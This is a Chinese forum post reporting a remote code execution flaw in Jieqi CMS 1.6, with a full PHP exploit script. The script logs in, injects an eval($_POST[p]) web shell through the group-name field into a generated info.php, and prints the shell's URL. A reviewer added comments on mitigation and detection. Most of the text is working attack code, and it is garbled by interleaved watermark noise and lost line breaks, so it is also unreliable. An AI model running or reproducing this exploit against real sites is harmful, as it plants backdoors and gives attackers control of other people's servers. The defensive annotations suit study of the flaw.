杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
6 s/ N7 }$ n8 a) s2 n3 Q<?php/ @4 C) \8 ?4 i. T! L$ F9 w- _# R
/*
 * Proof-of-concept for the code-injection flaw in the group ("圈子")
 * creation form of Jieqi CMS 1.6. The value posted as the "gname" field
 * appears to be embedded, unescaped, into a PHP file the CMS generates for
 * the new group (files/group/userdir/0/<group id>/info.php, see the final
 * URL at the bottom), so PHP code supplied in that field is later executed
 * by the web server. A logged-in account that is permitted to create
 * groups is required.
 *
 * Mitigation for operators: never serialise user-controlled fields into an
 * executable PHP file; keep group metadata in the database or in a
 * non-executable data format, and configure the web server so that files
 * under files/group/userdir are served as static content, not executed.
 * Detection: scan files matching files/group/userdir/*/*/info.php for
 * "eval(" or "$_POST", and review POSTs to modules/group/create.php whose
 * gname field contains quote characters or PHP syntax.
 *
 * NOTE(review): this listing was copied from a forum and carries watermark
 * noise (sequences such as "& C/ }$ ~! f") interleaved with the code and
 * with several line breaks lost; the exact original lines are not
 * recoverable from this copy, so it is annotated here rather than cleaned.
 */
% r+ |/ t( {" A" h# I0 j; E- T
print_r('& C/ }$ ~! f. N2 G5 e; j7 P# o
+---------------------------------------------------------------------------+
2 ]* W' v) o) \/ F# n$ xJieqi CMS V1.6 PHP Code Injection Exploit6 V6 {* z( G' U; d1 E
by flyh4t
- F8 t n+ @ T8 [' Y; ` cmail: phpsec at hotmail dot com9 }. c8 K1 W/ f8 t2 }# M1 f- D5 H
team: http://www.wolvez.org
. r0 f C; o# C0 D/ D4 w$ G+---------------------------------------------------------------------------+- u" l; h3 M# W- b
'); /**
 * works regardless of php.ini settings
*/ if ($argc < 5) { print_r('
- P$ V& U' K& O- B! [" A: s+---------------------------------------------------------------------------+
: L9 Y3 [ O% ]# @Usage: php '.$argv[0].' host path username# {7 n2 r9 s5 |+ \- G O6 h
host: target server (ip/hostname)
. `: e7 w- \5 i& N/ Ypath: path to jieqicms
' W4 `" }4 c; a9 G% guasename: a username who can create group6 ^3 S7 K" Y3 h+ g/ y! {! }
Example:* ^" w' F2 Y4 h5 K
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
$ k: R1 `8 w, |8 N% Q+---------------------------------------------------------------------------+6 q. E2 J* Z- M2 b$ f# H
'); exit; } error_reporting(7); /* 7 = E_ERROR | E_WARNING | E_PARSE; notices are silenced */ ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /* NOTE(review): the usage text above lists three arguments, but the $argc < 5 check and the example both require a fourth, the password */ /* step 1: log in with the supplied credentials and persist the session cookie to cookie.txt via CURLOPT_COOKIEJAR */ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; /* the submit value is the percent-encoded login button label: %26%23160%3B is the entity "&#160;" and %B5%C7%C2%BC looks like GBK-encoded "登录" — confirm against the CMS form */ $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); /* output buffering is used only to discard the login response body */ ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); /* NOTE(review): $ch is never assigned in this script; the handle is $curl1, so the printed error text is empty */ exit('exploit failed'); } curl_close($curl1); ob_clean(); /* step 2: hand-built multipart/form-data body for modules/group/create.php; the gname field carries the payload, the other fields (gcatid, gaudit, gbrief) are filler values */ $params ='-----------------------------23281168279961
T: D# ^. n2 y7 n, m, hContent-Disposition: form-data; name="gname"
- z# A4 _) U. A4 l( ^ ( N# n8 @, \* Y4 O
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t1 v2 h) H' z0 L M Q0 o
-----------------------------232811682799614 y D% D5 i* ~4 k4 R- A9 [
Content-Disposition: form-data; name="gcatid"
9 y3 [. v# Z8 H: N1 J8 I, O ( a2 l3 s! D/ C% i K j% H% i
1' C& x+ l" V+ t7 R$ G
-----------------------------23281168279961, x o9 |* R4 W
Content-Disposition: form-data; name="gaudit"8 z; f' D& ~% L- F+ N8 K+ S
Q6 k+ r! Q/ `- r! H; I
1; m- Q; T7 u) b" L
-----------------------------23281168279961
! n! j2 I0 l/ J/ GContent-Disposition: form-data; name="gbrief"
0 D' j) j4 x9 Q7 u . [0 Y% z, w# j
1
( i+ T8 @* J( [; \ |( F-----------------------------23281168279961--
, D0 x; v, P1 M' g9 @8 q2 H: Q'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); /* the boundary in the Content-Type header must match the one used in the body above */ $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); /* replay the session cookie captured at login */ curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); // $resp holds the create.php response body ($rs in the original note). NOTE(review): as pasted, this line comment also swallows the following statement and the forum noise after it: ob_clean(); www.2cto.com! t+ O9 m8 S! D. t# {. S+ b6 d
// step 3: the create.php response evidently carries a "g=<id>" parameter for the new group; that id names the directory of the generated info.php. NOTE(review): as pasted, the "//print_r($shell);" comment on the next line also comments out the $url assignment and both echo statements, so the final URL is never printed from this copy.
2 h$ x# ?! F) O. R" vpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |